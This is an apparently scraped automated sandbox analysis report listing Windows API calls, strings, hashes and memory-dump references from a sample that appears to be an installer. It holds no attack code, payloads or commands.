                                                          • Opcode Fuzzy Hash: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                          • Instruction Fuzzy Hash: C25186B1D00308EFDB11DF99C885BAEBBB8EB4C311F14806AF915B7241C6799945CFA9
                                                          APIs
                                                          • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,00456875), ref: 0045657A
                                                          • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,00456875), ref: 004565A0
                                                          • SysFreeString.OLEAUT32(?), ref: 0045672D
                                                          Strings
                                                          • IPropertyStore::Commit, xrefs: 0045677D
                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566C3
                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456712
                                                          • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 0045668F
                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456764
                                                          • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 0045679E
                                                          • IPersistFile::Save, xrefs: 004567FC
                                                          • CoCreateInstance, xrefs: 004565AB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance$FreeString
                                                          • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                          • API String ID: 308859552-3936712486
                                                          • Opcode ID: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                          • Instruction ID: c38ea0ca400292199a4bf55cc3a6d877564858b73cfd7edbf1df179bb9384e2e
                                                          • Opcode Fuzzy Hash: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                          • Instruction Fuzzy Hash: A5A12170A00145AFDB50DFA9C885B9E7BF8AF09306F55406AF804E7362DB38DD48CB69
                                                          APIs
                                                          • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3BB
                                                          • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3D7
                                                          • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EE
                                                          • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3FA
                                                          • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B427
                                                          • 73A1A480.USER32(00000000,00000000,0041B45A,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B44D
                                                          • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                          • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                          • DeleteDC.GDI32(?), ref: 0041B4D1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                          • String ID:
                                                          • API String ID: 359944910-0
                                                          • Opcode ID: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                          • Instruction ID: 33ab0b3d7217a913ee79b1f77f60082389afcfeada11791300d2e7ee1e5313f5
                                                          • Opcode Fuzzy Hash: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                          • Instruction Fuzzy Hash: FC41BC71E44619AFDB10DAE9C946FEFB7BCEB08704F104466B614F7281D678AD408BA8
                                                          APIs
                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472AE8
                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472BEF
                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C05
                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472C2A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                          • API String ID: 971782779-3668018701
                                                          • Opcode ID: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                          • Instruction ID: fd1e6c444996228d4851cdbb4885a0c41f61386fce8022a34f2115261328fc48
                                                          • Opcode Fuzzy Hash: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                          • Instruction Fuzzy Hash: 06D13574A001499FDB11EFA9D981BDEBBF4AF08304F50806AF904B7392D778AD45CB69
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,?,00000000,?,00000000,00454AE1,?,0045A98A,00000003,00000000,00000000,00454B18), ref: 00454961
                                                            • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 004549E5
                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 00454A14
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548B8
                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045487F
                                                          • , xrefs: 004548D2
                                                          • RegOpenKeyEx, xrefs: 004548E4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$FormatMessageOpen
                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                          • API String ID: 2812809588-1577016196
                                                          • Opcode ID: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                          • Instruction ID: ff4e522da132bb0e31d6f3ae6b90b680e2e6169bdaf0a1bf0a59660f44ee0e74
                                                          • Opcode Fuzzy Hash: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                          • Instruction Fuzzy Hash: 5B912571E44108ABDB40DFD5D942BDEB7F8EB48309F10406AF900FB682D6789E459B69
                                                          APIs
                                                            • Part of subcall function 00459184: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 0045931F
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 00459389
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 004593F0
                                                          Strings
                                                          • v4.0.30319, xrefs: 00459311
                                                          • .NET Framework version %s not found, xrefs: 00459429
                                                          • v2.0.50727, xrefs: 0045937B
                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045933C
                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593A3
                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004592D2
                                                          • .NET Framework not found, xrefs: 0045943D
                                                          • v1.1.4322, xrefs: 004593E2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Close$Open
                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                          • API String ID: 2976201327-446240816
                                                          • Opcode ID: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                          • Instruction ID: b06f59bb3d6be91165b8bdbc27cbaff9901adf20ec6b7ffb5bff20868c6d7bc9
                                                          • Opcode Fuzzy Hash: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                          • Instruction Fuzzy Hash: 7F51A131A04144EBCB00DFA988A17EE77B6DB49305F54447BE800DB382E63D9E0ACB58
                                                          APIs
                                                          • CloseHandle.KERNEL32(?), ref: 0045889B
                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588B7
                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588C5
                                                          • GetExitCodeProcess.KERNEL32(?), ref: 004588D6
                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045891D
                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458939
                                                          Strings
                                                          • Helper isn't responding; killing it., xrefs: 004588A7
                                                          • Helper process exited, but failed to get exit code., xrefs: 0045890F
                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 0045888D
                                                          • Helper process exited with failure code: 0x%x, xrefs: 00458903
                                                          • Helper process exited., xrefs: 004588E5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                          • API String ID: 3355656108-1243109208
                                                          • Opcode ID: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                          • Instruction ID: 5c1f132ce02699e8ecfae473a4aa832f70e08e49b07aa2054fbd8a494dc4d87a
                                                          • Opcode Fuzzy Hash: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                          • Instruction Fuzzy Hash: 582171706087409AD710E779C44575BB6D4AF48309F00C82FB9DAD7693DE7CE8488B6B
                                                          APIs
                                                            • Part of subcall function 0042DDDC: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 00454623
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 0045475F
                                                            • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                          Strings
                                                          • RegCreateKeyEx, xrefs: 00454597
                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045453B
                                                          • , xrefs: 00454585
                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045456B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                          • API String ID: 2481121983-1280779767
                                                          • Opcode ID: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                          • Instruction ID: 79a928fbfbb5cbc52e9f584d13fa8ff479f10e23804a0d57af644d787f67e4fc
                                                          • Opcode Fuzzy Hash: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                          • Instruction Fuzzy Hash: 4C812275A00209AFDB00DFD5C841BEEB7B9EF49305F50452AF900FB292D7789A49CB69
                                                          APIs
                                                            • Part of subcall function 00453890: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                            • Part of subcall function 00453890: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004961D9
                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049632D), ref: 004961FA
                                                          • CreateWindowExA.USER32(00000000,STATIC,0049633C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496221
                                                          • SetWindowLongA.USER32(?,000000FC,004959B4), ref: 00496234
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC,0049633C), ref: 00496264
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004962D8
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000), ref: 004962E4
                                                            • Part of subcall function 00453D04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                          • 73A25CF0.USER32(?,00496307,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC), ref: 004962FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                          • API String ID: 170458502-2312673372
                                                          • Opcode ID: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                          • Instruction ID: 59c6668a25180793b9734d4b881d6428f2164d7595bd96eb0933aaec2009094d
                                                          • Opcode Fuzzy Hash: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                          • Instruction Fuzzy Hash: 30413070A00204AFDF11EBA5DD42FAE7BB8EB09714F61457AF500F7291D7799A048B68
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E439
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E43F
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E48D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressCloseHandleModuleProc
                                                          • String ID: %aE$.DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                          • API String ID: 4190037839-4073108654
                                                          • Opcode ID: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                          • Instruction ID: 54e13c124a033066941eeca65415b1323707e8dcf3020f71d3dbb5d1a98da02b
                                                          • Opcode Fuzzy Hash: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                          • Instruction Fuzzy Hash: C5214430B10225BBDB00EAE7DC45B9E76B8EB48708F904477A500E7281E77CDE419B1C
                                                          APIs
                                                          • GetActiveWindow.USER32 ref: 00462824
                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
                                                          • GetWindowRect.USER32(?,00000000), ref: 0046289E
                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004628DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                          • API String ID: 2610873146-3407710046
                                                          • Opcode ID: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                          • Instruction ID: 4c37a186de2a83ca6a9e6f1427afc5cce354ac5e92891655707437263646b99d
                                                          • Opcode Fuzzy Hash: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                          • Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
                                                          APIs
                                                          • GetActiveWindow.USER32 ref: 0042F18C
                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A0
                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1AD
                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1BA
                                                          • GetWindowRect.USER32(?,00000000), ref: 0042F206
                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F244
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                          • API String ID: 2610873146-3407710046
                                                          • Opcode ID: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                          • Instruction ID: fe4b6ce3f65a79f89e9c436b8398c0b3b6e1cac74b3897b930778965e8aa8e9e
                                                          • Opcode Fuzzy Hash: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                          • Instruction Fuzzy Hash: 8A21D479300710ABD700D668EC81F3B36E8EB85710F88457AF944DB3C1DA79EC048BA9
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B,?,00000000,00458C7E,?,?,02213858,00000000), ref: 00458A99
                                                          • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458AF6
                                                          • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458B03
                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B4F
                                                          • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000), ref: 00458B75
                                                          • GetLastError.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000), ref: 00458B7C
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
